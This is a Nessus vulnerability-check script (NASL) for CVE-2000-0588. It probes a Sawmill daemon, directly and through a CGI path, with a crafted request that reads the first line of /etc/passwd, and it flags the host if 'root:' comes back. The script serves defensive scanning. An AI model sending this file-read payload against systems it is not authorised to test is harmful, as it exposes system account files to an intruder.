#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10453);
 script_version ("$Revision: 1.10 $");
 script_cve_id("CVE-2000-0588");

 name["english"] = "sawmill allows the reading of the first line of any file";
 name["francais"] = "sawmill allows the reading of the first line of any file";
 script_name(english:name["english"], francais:name["francais"]);
 
 desc["english"] = "
The remote sawmill daemon allows the reading of the first
line of arbitrary files on the remote system.

Solution : upgrade
Risk factor : Medium";


 desc["francais"] = "
Le daemon sawmill distant permet la lecture de la
premiere ligne de fichiers arbitraires sur l'hotre
distant.

Solution : mettez-le  jour
Facteur de risque : Moyen";


 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "Checks if sawmill reads any file";
 summary["francais"] = "Vrifie si sawmill lit n'importe quel fichier";
 
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_GATHER_INFO);
 
 
 script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
		francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
 family["english"] = "Remote file access";
 family["francais"] = "Accs aux fichiers distants";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes");
 script_require_ports(8987, "Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

port = 8987;
if(get_port_state(port))
{
 soc = open_sock_tcp(port);
 if(soc)
 {
  req  = string("/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3");
  req = http_get(item:req, port:port);
  send(socket:soc, data:req);
  r = recv(socket:soc, length:4096);
  if("root:" >< r)
  {
   set_kb_item(name:"Sawmill/readline", value:TRUE);
   set_kb_item(name:"Sawmill/method", value:"standalone");
   security_warning(port);
  }
 }
}


port = get_kb_item("Services/www");
if(!port) port = 80;
cgibin = cgibin();
soc = open_sock_tcp(port);
if(soc)
{
  req = string(cgibin, "/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3");
  req = http_get(item:req, port:port);
  send(socket:soc, data:req);
  r = recv(socket:soc, length:4096);
  if("root:" >< r)
  {
   set_kb_item(name:"Sawmill/readline", value:TRUE);
   set_kb_item(name:"Sawmill/method", value:"cgi");
   security_warning(port);
  }
}

